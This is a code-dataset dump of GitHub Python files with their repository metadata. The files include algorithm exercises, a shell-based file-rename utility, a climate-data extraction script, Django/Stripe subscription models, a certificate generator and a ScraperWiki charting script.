blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
55d298950c7d7ca21de4fa38f72dc8b508087211 | 93db4b48741ff4ab0a3895813a6c7543e01821ea | /leetcode/Python/884_decoded_str.py | 436b4076dfc4d56b8920181fbd41bd1e380db873 | [] | no_license | shubham14/Coding_Contest_solutions | f884c458d3316bdafc6f1b1a52cf3e962c58bc47 | 1b67497f35b892c25e3d9600214fa37a738ffd40 | refs/heads/master | 2021-06-22T13:34:10.581101 | 2019-10-09T02:56:01 | 2019-10-09T02:56:01 | 131,326,516 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,125 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Aug 11 19:42:57 2018
@author: Shubham
"""
import math
class Solution:
def maxArea(self, A, B, C, D, E, F, G, H):
areaSum = (C-A)*(D-B) + (G-E)*(H-F)
if(E>=C or A>=G or B>=H or F>=D):
return areaSum
bX = max(A, E)
bY = max(B, F)
tX = min(C, G)
tY = min(D, H)
areaIntersect = (tX-bX)*(tY-bY);
return areaSum - areaIntersect
def minSquare(self, n):
s = [i*i for i in range(1, int(math.sqrt(n)) + 1)]
l = 0
currentLevel = [0]
while True:
nextLevel = []
for a in currentLevel:
for b in s:
if a + b == n:
return l + 1
if a + b < n:
nextLevel.append(a + b)
currentLevel = list(set(nextLevel))
l += 1
def rev_str(self, str1, st, end):
while st <= end:
str1[st], str1[end] = str1[end], str1[st]
st += 1
end -= 1
return str1
def rev_sent(self, sent):
start = 0
end = 0
sent = list(sent)
for i, ele in enumerate(sent):
if ele == ' ' and start != end:
end = i - 1
sent = self.rev_str(sent, start, end)
start = i + 1
sent = self.rev_str(sent, start, len(sent)-1)
return sent
class MinStack:
def __init__(self):
self.min_stack = []
self.top = -1
self.minEle = 1000000
self.next_minEle = 999999
def push(self, x):
self.min_stack.append(x)
self.top += 1
if x < self.minEle:
self.next_minEle = self.minEle
self.minEle = x
def pop(self):
if self.min_stack[self.top] == self.minEle:
self.minEle = self.next_minEle
self.min_stack.pop()
self.top -= 1
def top(self):
return self.min_stack[self.top]
def getMin(self):
return self.minEle | [
"shubham.ddash@gmail.com"
] | shubham.ddash@gmail.com |
5fdf10d2c3284be8fe2c12dd47d17a980192a24d | 477a1182c09f276e8d29651222ba72968074fcb8 | /Fizz Buzz.py | 1691cf23a3ddb9911ba968b01c0572d305dfe589 | [] | no_license | a58982284/cookbook | 900ed8f8f2d1fb4111076074607574645ac07314 | 7490a968e93c85df0d4d9701d0901e2a8c3bdfac | refs/heads/master | 2020-03-29T12:04:08.316281 | 2018-09-22T14:14:44 | 2018-09-22T14:14:44 | 149,883,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | def checkio(number: int) -> str:
if number%3 == 0 and number%5==0:
return 'Fizz Buzz'
elif number%3==0 and number%5!=0:
return 'Fizz'
elif number%3 !=0 and number%5==0:
return 'Buzz'
else:
return str(number)
print(checkio(15))
print(checkio(6))
print(checkio(5))
print(checkio(7)) | [
"a58982284@163.com"
] | a58982284@163.com |
9b8122ee97bc2012e154cd33cd099e61ed67ab7b | de88a649182d42206358e53bba69252e04d8a69f | /abc_py/abc168/c.py | b616070660aef9a02ea101c6794186568462f0ec | [] | no_license | aki-nasu/competition | 47b05312d9b19dcf62212570d6253ec7a109382d | 9edb02abb14d896932f08218417d3f10b54f1755 | refs/heads/master | 2021-06-22T22:09:14.433407 | 2021-06-06T06:53:42 | 2021-06-06T06:53:42 | 225,662,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | import math
a,b,h,m = map(int,input().split())
ra = h * 30 + m * 0.5
rb = m * 6
r = math.radians(abs(ra-rb))
# (abs(ra-rb)*math.pi)/180
print(math.sqrt(a**2 + b**2 - 2*a*b*math.cos(r)))
| [
"t.t.akiyoshi2@gmail.com"
] | t.t.akiyoshi2@gmail.com |
9325ce23a6bcefeac701f51d38d1513df3b719a6 | 814f8b85dd6435b3bb3fdebf2f193912aa145a62 | /image_segmentation/CycleGAN/__init__.py | b7901d30d6a0433aae360a3b18a7d65798dcb49b | [
"Apache-2.0"
] | permissive | jacke121/pycharm | 480df86258ee918de25b76a4156e9e6b9d355df7 | b9b2963cf0c5028f622f41413f52f1b5cbde28a1 | refs/heads/master | 2020-03-18T16:35:25.579992 | 2018-01-01T02:30:58 | 2018-01-01T02:30:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by weihang huang on 17-12-10
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
import os
root = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + '/'
| [
"614047311@qq.com"
] | 614047311@qq.com |
389ab210334c512ad944a1569f96a0cfda9fea26 | 3482beb24c0635efcb60391d27c1987b7fb413a5 | /kvipytools/kvipytools/rename.py | cce6f4b4865c27f1c76dac3edfdbb3d77e504d17 | [] | no_license | rpgplanet/rpgplanet-all | ad2e6a00935d2b214ba41b4adced524f1bd443db | 6d473369cd8263f59ebcbf7f812fd4d34d4d785e | refs/heads/master | 2021-01-13T01:43:58.718833 | 2010-10-28T10:25:01 | 2010-10-28T10:25:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,987 | py | #!/usr/bin/env python
import sys, os
class OptionParser(object):
'''
parser commandline optiones separated by given separator::
./rename.py a=b c=d "a a a=b b b" a\\==\\=b
will result into something like this::
opts = [ ('a', 'b'), ('c', 'd'), ('a a a', 'b b b'), ('a=', '=b') ]
'''
def __init__(self, escape_char='\\', escape_replacement=-1, splitter_char='=', splitter_replacement=-2):
self.escape_char = escape_char
self.escape_replacement = escape_replacement
self.splitter_char = splitter_char
self.splitter_replacement = splitter_replacement
def split_string(self, string):
return [ c for c in string ]
def replace_pair(self, chars, pair, replacement):
'''
go through chars in pairs and if two chars equals given pair
put some special mark instead
'''
escaped_chars = []
hop = False
for i, j in enumerate(chars):
if hop:
hop = False
continue
if i < (len(chars) - 1):
if (j, chars[i+1]) == pair:
hop = True
x = replacement
else:
x = j
else:
x = j
escaped_chars.append(x)
return escaped_chars
def escape_escape(self, chars):
pair = (self.escape_char, self.escape_char)
return self.replace_pair(chars, pair, self.escape_replacement)
def escape_split(self, chars):
pair = (self.escape_char, self.splitter_char)
return self.replace_pair(chars, pair, self.splitter_replacement)
def split_via_equalsign(self, chars, splitter='='):
index = chars.index(splitter)
return (chars[:index], chars[index+1:])
def list_replace_all(self, seq, obj, repl):
for i, elem in enumerate(seq):
if elem == obj:
seq[i] = repl
def __call__(self, opts):
"""
parse options given on cmdline separated by equal sign:
>>> OptionParser()(['a=b', 'x x x=y y y'])
[('a', 'b'), ('x x x', 'y y y')]
"""
parsed_opts = []
for o in opts:
o = self.escape_escape(o)
o = self.escape_split(o)
l, r = self.split_via_equalsign(o)
for i in l, r:
self.list_replace_all(i, self.splitter_replacement, self.splitter_char)
self.list_replace_all(i, self.escape_replacement, self.escape_char)
parsed_opts.append((''.join(l), ''.join(r)))
return parsed_opts
def call_command(cmd, options, verbose=False):
"""
helper function that call shell command for every tuple in options
"""
for patrn, repl in options:
repl = {'patrn': patrn, 'repl': repl,}
command = cmd % repl
print 'running: %s' % command
if not verbose:
command += '&>/dev/null'
os.system(command)
def rename_files_dirs(options):
"""
rename all dirs and files to new name defined via options
"""
# create dirs first
call_command('''find . -type d | while read f; do mkdir -p "$(echo $f | sed 's/%(patrn)s/%(repl)s/g')"; done''', options)
# than move files
call_command('''find . -type f | while read f; do mv "$f" "$(echo $f | sed 's/%(patrn)s/%(repl)s/g')"; done''', options)
# delete empty dirs
call_command('''find -depth -type d -empty -exec rmdir {} \;''', [(1,1)])
def change_content(options):
"""
take file by file and replace any occurence of pattern with its replacement
"""
call_command('''grep -r -l -- '%(patrn)s' . | tr '\\n' '\\0' | xargs -0 sed -i "s/%(patrn)s/%(repl)s/g"''', options)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
parse_options = OptionParser()
options = parse_options(sys.argv[1:])
rename_files_dirs(options)
change_content(options)
if __name__ == '__main__':
main()
| [
"bugs@almad.net"
] | bugs@almad.net |
30cb098c7657866cc84531411b8c6256998523ed | 3a5ad075884d55593464f97df758de1891bfd3f2 | /all_Gryzinski/BDE_model.py | 6affdeb9cf80c7abc20558e4776bbe0101198979 | [] | no_license | fedorsidorov/DEBER-Simulation-2.0 | 1a812e950749cf86e8e0dbd4d3514fc58f710e9a | eca39922df628ca6dcfbfb2af61aaa469fe66074 | refs/heads/master | 2022-04-26T13:23:24.262182 | 2020-04-24T23:43:12 | 2020-04-24T23:43:12 | 202,705,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,527 | py | #%% Import
import numpy as np
import os
import importlib
import matplotlib.pyplot as plt
import copy
import my_constants as mc
mc = importlib.reload(mc)
import E_loss_functions as elf
elf = importlib.reload(elf)
os.chdir(mc.sim_folder + 'all_Gryzinski')
#%%
MMA_bonds = {}
#kJmol_2_eV = 1e+3 / (mc.Na * mc.eV)
kJmol_2_eV = 0.0103
MMA_bonds['Op-Cp'] = 815 * kJmol_2_eV, 8
MMA_bonds['O-Cp'] = 420 * kJmol_2_eV, 4
MMA_bonds['H-C3'] = 418 * kJmol_2_eV, 12
MMA_bonds['H-C2'] = 406 * kJmol_2_eV, 4
MMA_bonds['Cp-Cg'] = 383 * kJmol_2_eV, 2
MMA_bonds['O-C3'] = 364 * kJmol_2_eV, 4
MMA_bonds['C-C3'] = 356 * kJmol_2_eV, 2
MMA_bonds['C-C2'] = 354 * kJmol_2_eV, 4
Eb_Nel = np.array(list(MMA_bonds.values()))
#%%
def get_stairway(b_map_sc):
# b_map_sc = dict([('C-C2', 4)])
Eb_Nel_sc_list = []
for val in b_map_sc.keys():
Eb_Nel_sc_list.append([MMA_bonds[val][0], MMA_bonds[val][1]])
Eb_Nel_sc = np.array(Eb_Nel_sc_list)
probs = np.zeros(len(mc.EE))
nums = np.zeros(len(mc.EE))
dens = np.zeros(len(mc.EE))
for i, e in enumerate(mc.EE):
num = 0
for st in Eb_Nel_sc:
if e >= st[0]:
num += st[1]
if num == 0:
continue
nums[i] = num
den = 0
for st in Eb_Nel:
if e >= st[0]:
den += st[1]
dens[i] = den
probs[i] = num / den
return probs
#%%
PMMA_total_inel_U = np.load(mc.sim_folder + 'E_loss/diel_responce/Dapor/PMMA_U_Dapor.npy')
#PMMA_diff_inel_U = np.load(mc.sim_folder +\
# 'E_loss/diel_responce/Dapor/PMMA_diff_U_Dapor_Ashley.npy')
PMMA_SP = np.load(mc.sim_folder + 'E_loss/diel_responce/Dapor/PMMA_SP_Dapor.npy')
#%% Go Fryzinski
total_U = np.zeros(len(mc.EE))
total_SP = np.zeros(len(mc.EE))
for bond in MMA_bonds:
total_U += elf.get_Gryzinski_CS(mc.EE, MMA_bonds[bond][0]) * MMA_bonds[bond][1] * mc.n_PMMA_mon
total_SP += elf.get_Gryzinski_SP(mc.EE, MMA_bonds[bond][0], mc.n_PMMA_mon, MMA_bonds[bond][1])
#%% U
plt.loglog(mc.EE, PMMA_total_inel_U, label='Dapor')
plt.loglog(mc.EE, total_U, label='Gryzinski + BDE')
plt.title('PMMA Dapor and Gryz+BDE U')
plt.xlabel('E, eV')
plt.ylabel('U, cm$^{-1}$')
plt.legend()
plt.grid()
#plt.savefig('PMMA_Dapor_Gryz+BDE_U.png', dpi=300)
#%% SP
plt.loglog(mc.EE, PMMA_SP, label='Dapor')
plt.loglog(mc.EE, total_SP, label='Gryzinski + BDE')
plt.xlabel('E, eV')
plt.ylabel('SP, eV/cm')
plt.legend()
plt.grid()
#plt.savefig('PMMA_Dapor_Gryz+BDE_SP.png', dpi=300)
#%% Gryzinski stairway
gryz_bond_U = np.zeros((len(MMA_bonds), len(mc.EE)))
for i in range(len(MMA_bonds)):
gryz_bond_U[i, :] = elf.get_Gryzinski_CS(mc.EE, MMA_bonds[list(MMA_bonds.keys())[i]][0]) *\
MMA_bonds[list(MMA_bonds.keys())[i]][1] * mc.n_PMMA_mon
plt.loglog(mc.EE, gryz_bond_U[i, :], label=list(MMA_bonds.keys())[i])
plt.title('PMMA Dapor and Gryz+BDE bond CS for each bond')
plt.xlabel('E, eV')
plt.ylabel('U, cm$^{-1}$')
plt.ylim(1e+5, 1e+8)
plt.legend()
plt.grid()
#plt.savefig('PMMA_Dapor_Gryz+BDE_U_bonds.png', dpi=300)
#%%
def get_w_scission(EE):
result = np.zeros(len(EE))
result = np.ones(len(EE)) * 4/40
result[np.where(EE < 815 * 0.0103)] = 4/(40 - 8)
result[np.where(EE < 420 * 0.0103)] = 4/(40 - 8 - 4)
result[np.where(EE < 418 * 0.0103)] = 4/(40 - 8 - 4 - 12)
result[np.where(EE < 406 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4)
result[np.where(EE < 383 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4 - 2)
result[np.where(EE < 364 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4 - 2 - 4)
result[np.where(EE < 356 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4 - 2 - 4 - 2)
result[np.where(EE < 354 * 0.0103)] = 0
return result
probs_easy = get_w_scission(mc.EE)
#%%
new_probs_easy = get_stairway({'C-C2': 4, 'C-C3': 2})
#%%
probs = np.zeros(len(mc.EE))
for i in range(len(probs)):
if np.sum(gryz_bond_U[:, i]) == 0:
continue
probs[i] = np.sum(gryz_bond_U[-2:, i]) / np.sum(gryz_bond_U[:, i])
end_ind = 200
plt.plot(mc.EE[:end_ind], probs_easy[:end_ind], label='basic')
plt.plot(mc.EE[:end_ind], new_probs_easy[:end_ind], label='new basic')
plt.plot(mc.EE[:end_ind], probs[:end_ind], label='Gryzinsky')
plt.title('Scission probability')
plt.xlabel('E, eV')
plt.ylabel('p')
plt.legend()
plt.grid()
#plt.savefig('scission_probs.png', dpi=300)
| [
"fedor.sidorov.92@yandex.ru"
] | fedor.sidorov.92@yandex.ru |
b0788388960b10b9cc402064bdf16311c76adf2a | 9ce0d602404b2329dfb36a0ae31b43dd1865d76d | /app/models.py | d9f118e64dfe4d21fefde1ec1ff4885190fe0e26 | [] | no_license | haruyasu/django-video-membership | 0cf40e6c2d28bbbc1c4c608df378a163b83f1654 | 87b8a0c4b3b12c4b901303bd2c6ee078069ba167 | refs/heads/main | 2023-01-01T18:39:13.697284 | 2020-10-25T10:59:41 | 2020-10-25T10:59:41 | 305,915,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,721 | py | from django.db import models
from django.conf import settings
from django.db.models.signals import pre_save, post_save
from django.contrib.auth.signals import user_logged_in
from django.utils.text import slugify
from django.shortcuts import reverse
from django.contrib.auth import get_user_model
from allauth.account.signals import email_confirmed
import stripe
stripe.api_key = settings.STRIPE_SECRET_KEY
User = get_user_model()
class Pricing(models.Model):
name = models.CharField(max_length=100) # Basic / Pro / Premium
slug = models.SlugField()
stripe_price_id = models.CharField(max_length=100)
price = models.IntegerField()
def __str__(self):
return self.name
class Subscription(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
pricing = models.ForeignKey(Pricing, on_delete=models.CASCADE, related_name='subscriptions')
created = models.DateTimeField(auto_now_add=True)
stripe_subscription_id = models.CharField(max_length=50)
status = models.CharField(max_length=100)
def __str__(self):
return self.user.email
@property
def is_active(self):
return self.status == "active" or self.status == "trialing"
class Course(models.Model):
pricing_tiers = models.ManyToManyField(Pricing, blank=True)
name = models.CharField(max_length=100)
slug = models.SlugField(unique=True)
thumbnail = models.ImageField(upload_to="images")
description = models.TextField()
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("course-detail", kwargs={"slug": self.slug})
class Video(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name='videos')
vimeo_id = models.CharField(max_length=50)
title = models.CharField(max_length=150)
slug = models.SlugField(unique=True)
description = models.TextField()
order = models.IntegerField(default=1)
class Meta:
ordering = ["order"]
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("video-detail", kwargs={
"video_slug": self.slug,
"slug": self.course.slug
})
def pre_save_course(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = slugify(instance.name)
def pre_save_video(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = slugify(instance.title)
def post_email_confirmed(request, email_address, *args, **kwargs):
user = User.objects.get(email=email_address.email)
free_trial_pricing = Pricing.objects.get(name='Free Trial')
subscription = Subscription.objects.create(
user=user,
pricing=free_trial_pricing
)
stripe_customer = stripe.Customer.create(
email=user.email
)
stripe_subscription = stripe.Subscription.create(
customer=stripe_customer["id"],
items=[{'price': 'django-free-trial'}],
trial_period_days=7
)
subscription.status = stripe_subscription["status"] # trialing
subscription.stripe_subscription_id = stripe_subscription["id"]
subscription.save()
user.stripe_customer_id = stripe_customer["id"]
user.save()
def user_logged_in_receiver(sender, user, **kwargs):
subscription = user.subscription
sub = stripe.Subscription.retrieve(subscription.stripe_subscription_id)
subscription.status = sub["status"]
subscription.save()
user_logged_in.connect(user_logged_in_receiver)
email_confirmed.connect(post_email_confirmed)
pre_save.connect(pre_save_course, sender=Course)
pre_save.connect(pre_save_video, sender=Video)
| [
"harukun2002@gmail.com"
] | harukun2002@gmail.com |
64a399c18f23c2f0509b1b87319fcf387ad2065d | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/01_netCDF_extraction/merra902TG/830-tideGauge.py | 98529851e7c0414d44337ffea9a71bbf32c354c9 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,075 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 01 10:00:00 2020
MERRAv2 netCDF extraction script - template
To create an extraction script for each tide gauge
@author: Michael Tadesse
"""
import os
import pandas as pd
from d_merra_define_grid import Coordinate, findPixels, findindx
from c_merra_read_netcdf import readnetcdf
from f_merra_subset import subsetter
def extract_data(delta= 3):
"""
This is the master function that calls subsequent functions
to extract uwnd, vwnd, slp for the specified
tide gauges
delta: distance (in degrees) from the tide gauge
"""
print('Delta = {}'.format(delta), '\n')
#defining the folders for predictors
dir_in = "/lustre/fs0/home/mtadesse/MERRAv2/data"
surge_path = "/lustre/fs0/home/mtadesse/obs_surge"
csv_path = "/lustre/fs0/home/mtadesse/merraLocalized"
#cd to the obs_surge dir to get TG information
os.chdir(surge_path)
tg_list = os.listdir()
#cd to the obs_surge dir to get TG information
os.chdir(dir_in)
years = os.listdir()
#################################
#looping through the year folders
#################################
#to mark the first csv
firstCsv = True;
for yr in years:
os.chdir(dir_in)
#print(yr, '\n')
os.chdir(os.path.join(dir_in, yr))
####################################
#looping through the daily .nc files
####################################
for dd in os.listdir():
os.chdir(os.path.join(dir_in, yr)) #back to the predictor folder
print(dd, '\n')
#########################################
#get netcdf components - predictor file
#########################################
nc_file = readnetcdf(dd)
lon, lat, time, predSLP, predU10, predV10 = \
nc_file[0], nc_file[1], nc_file[2], nc_file[3], nc_file[4]\
, nc_file[5]
x = 830
y = 831
#looping through individual tide gauges
for t in range(x, y):
#the name of the tide gauge - for saving purposes
# tg = tg_list[t].split('.mat.mat.csv')[0]
tg = tg_list[t]
#extract lon and lat data from surge csv file
#print(tg, '\n')
os.chdir(surge_path)
if os.stat(tg).st_size == 0:
print('\n', "This tide gauge has no surge data!", '\n')
continue
surge = pd.read_csv(tg, header = None)
#surge_with_date = add_date(surge)
#define tide gauge coordinate(lon, lat)
tg_cord = Coordinate(surge.iloc[0,0], surge.iloc[0,1])
#find closest grid points and their indices
close_grids = findPixels(tg_cord, delta, lon, lat)
ind_grids = findindx(close_grids, lon, lat)
#loop through preds#
#subset predictor on selected grid size
predictors = {'slp':predSLP, 'wnd_u':predU10, \
'wnd_v':predV10}
for xx in predictors.keys():
pred_new = subsetter(dd, predictors[xx], ind_grids, time)
if xx == 'slp':
if firstCsv:
finalSLP = pred_new
else:
finalSLP = pd.concat([finalSLP, pred_new], axis = 0)
print(finalSLP.shape)
elif xx == 'wnd_u':
if firstCsv:
finalUwnd = pred_new
else:
finalUwnd = pd.concat([finalUwnd, pred_new], axis = 0)
elif xx == 'wnd_v':
if firstCsv:
finalVwnd = pred_new
firstCsv = False;
else:
finalVwnd = pd.concat([finalVwnd, pred_new], axis = 0)
#create directories to save pred_new
os.chdir(csv_path)
#tide gauge directory
tg_name_old = tg.split('.mat.mat.csv')[0]
tg_name = '-'.join([str(t), tg_name_old])
try:
os.makedirs(tg_name)
os.chdir(tg_name) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg_name)
#save as csv
finalSLP.to_csv('slp.csv')
finalUwnd.to_csv('wnd_u.csv')
finalVwnd.to_csv('wnd_v.csv')
#run script
extract_data(delta= 3)
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
884b9d01cec1bf9f1ce1a06c648463cd2ddab33d | 159aed4755e47623d0aa7b652e178296be5c9604 | /data/scripts/templates/object/draft_schematic/clothing/shared_clothing_shirt_casual_04.py | 1f8fd20f134c94f5a9dd3f2bdc8e6da119d5dd5b | [
"MIT"
] | permissive | anhstudios/swganh | fb67d42776864b1371e95f769f6864d0784061a3 | 41c519f6cdef5a1c68b369e760781652ece7fec9 | refs/heads/develop | 2020-12-24T16:15:31.813207 | 2016-03-08T03:54:32 | 2016-03-08T03:54:32 | 1,380,891 | 33 | 44 | null | 2016-03-08T03:54:32 | 2011-02-18T02:32:45 | Python | UTF-8 | Python | false | false | 462 | py | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/clothing/shared_clothing_shirt_casual_04.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | [
"rwl3564@rit.edu"
] | rwl3564@rit.edu |
91965e649e25eb2201b821ce51e22d441092e675 | f7b25eaee7a19767a27f6172b87e552bcfe608ad | /apps/certification/tests.py | 42c8dfc07ad42bee54b4ddce012a3fb48cc6fc0a | [] | no_license | Mid0Riii/Psyconsole | addf280e075e29abc746b437a114d531d2e70f10 | d9540e0b4b37fdd44be0a169d3ce8cdddc2b956a | refs/heads/master | 2023-01-01T05:10:18.520481 | 2020-10-18T11:11:26 | 2020-10-18T11:11:26 | 266,294,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | from django.test import TestCase
# Create your tests here.
import qrcode
from PIL import Image, ImageDraw, ImageFont
import datetime
#
# image = Image.open('assets/cert.jpg')
#
# def get_size(image):
# #获取图像的宽和高
# width, height = image.size
# return width,height
#
# setFont = ImageFont.truetype("assets/msyh.ttf",20)
# print(get_size(image))
# draw = ImageDraw.Draw(image)
# draw.text((200,100),"测试",fill="black",font=setFont)
# image.show()
# # img = qrcode.make('http://www.baidu.com')
# # with open('test.png', 'wb') as f:
# # img.save(f)
def generateCert(type, code, name, gender, unit,grade,title,avai_year,avai_mouth,avai_day,avatar):
curr_time = datetime.datetime.now()
localdate = curr_time.strftime("%Y-%m-%d").split("-")
image = Image.open('assets/cert.jpg')
fontPath = "assets/msyh.ttf"
setFont = ImageFont.truetype(fontPath, 70)
dateFont = ImageFont.truetype(fontPath,50)
draw = ImageDraw.Draw(image)
draw.text((700, 260), type, fill="black", font=setFont)
draw.text((700, 400), code, fill="black", font=setFont)
draw.text((1290, 1500), name, fill="black", font=setFont)
draw.text((1290, 1630), gender, fill="black", font=setFont)
draw.text((1430, 1760), unit, fill="black", font=setFont)
draw.text((1430, 1890), grade, fill="black", font=setFont)
draw.text((1290, 2010), title, fill="black", font=setFont)
draw.text((1230, 2295), avai_year, fill="black", font=dateFont)
draw.text((1450, 2295), avai_mouth, fill="black", font=dateFont)
draw.text((1600, 2295), avai_day, fill="black", font=dateFont)
draw.text((1660, 2805), localdate[0], fill="black", font=dateFont)
draw.text((1870, 2805), localdate[1], fill="black", font=dateFont)
draw.text((2010, 2805), localdate[2], fill="black", font=dateFont)
avatar = Image.open("assets/defaultavatar.jpg").convert("CMYK")
avatar = avatar.resize((400,560))
image.paste(avatar,(585,1525))
image.show()
generateCert("37373737373737", "普通会员", "张三", "男", "南昌大学", "二级", "讲师", "2020","11","20","" )
| [
"1534296263@qq.com"
] | 1534296263@qq.com |
579496a4ada0cb14b1e59a2b9b0b835e5ce6c8ee | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/M/mick/test_395.py | 215e88633f5bb3f554649c55ba67ce4f7bef9adc | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | import scraperwiki
import gviz_api
page_template = """
<html>
<head>
<title>Bar-Meter</title>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script>
google.load("visualization", "1", {packages:["table","corechart"]});
google.setOnLoadCallback(drawTable);
function drawTable() {
%(jscode)s
var jscode_table = new google.visualization.Table(document.getElementById('table_div_jscode'));
jscode_table.draw(jscode_data, {showRowNumber: true});
%(jscode_chart)s
var chart = new google.visualization.PieChart(document.getElementById('chart_div'));
chart.draw(jscode_data_chart, {title: 'Bars per city'});
}
</script>
</head>
<body>
<H1>Bars in Austrian cities</H1>
<div id="table_div_jscode"></div>
<div id="chart_div" style="width: 900px; height: 500px;"></div>
</body>
</html>
"""
def main():
scraperwiki.sqlite.attach("at_herold_branches")
data = scraperwiki.sqlite.select(
'''city, branch, count(*) as business from at_herold_branches.swdata
where branch='was_bars'
group by city, branch
order by business desc'''
)
description = {"city": ("string", "City"),
"branch": ("string", "Branch"),
"business": ("number", "Count")}
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
# Creating a JavaScript code string
jscode = data_table.ToJSCode("jscode_data",
columns_order=("city", "branch", "business"))
# Creating a JSon string
#json = data_table.ToJSon(columns_order=("city", "branch", "business"),
# order_by="city")
data_chart = scraperwiki.sqlite.select(
'''city, count(*) as business from at_herold_branches.swdata
group by city'''
)
description_chart = {"city": ("string", "City"),
"business": ("number", "Count")}
data_table_chart = gviz_api.DataTable(description_chart)
data_table_chart.LoadData(data_chart)
jscode_chart = data_table_chart.ToJSCode("jscode_data_chart",
columns_order=("city", "business"),
order_by="city")
print page_template % vars()
main()
import scraperwiki
import gviz_api
page_template = """
<html>
<head>
<title>Bar-Meter</title>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script>
google.load("visualization", "1", {packages:["table","corechart"]});
google.setOnLoadCallback(drawTable);
function drawTable() {
%(jscode)s
var jscode_table = new google.visualization.Table(document.getElementById('table_div_jscode'));
jscode_table.draw(jscode_data, {showRowNumber: true});
%(jscode_chart)s
var chart = new google.visualization.PieChart(document.getElementById('chart_div'));
chart.draw(jscode_data_chart, {title: 'Bars per city'});
}
</script>
</head>
<body>
<H1>Bars in Austrian cities</H1>
<div id="table_div_jscode"></div>
<div id="chart_div" style="width: 900px; height: 500px;"></div>
</body>
</html>
"""
def main():
scraperwiki.sqlite.attach("at_herold_branches")
data = scraperwiki.sqlite.select(
'''city, branch, count(*) as business from at_herold_branches.swdata
where branch='was_bars'
group by city, branch
order by business desc'''
)
description = {"city": ("string", "City"),
"branch": ("string", "Branch"),
"business": ("number", "Count")}
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
# Creating a JavaScript code string
jscode = data_table.ToJSCode("jscode_data",
columns_order=("city", "branch", "business"))
# Creating a JSon string
#json = data_table.ToJSon(columns_order=("city", "branch", "business"),
# order_by="city")
data_chart = scraperwiki.sqlite.select(
'''city, count(*) as business from at_herold_branches.swdata
group by city'''
)
description_chart = {"city": ("string", "City"),
"business": ("number", "Count")}
data_table_chart = gviz_api.DataTable(description_chart)
data_table_chart.LoadData(data_chart)
jscode_chart = data_table_chart.ToJSCode("jscode_data_chart",
columns_order=("city", "business"),
order_by="city")
print page_template % vars()
main()
| [
"pallih@kaninka.net"
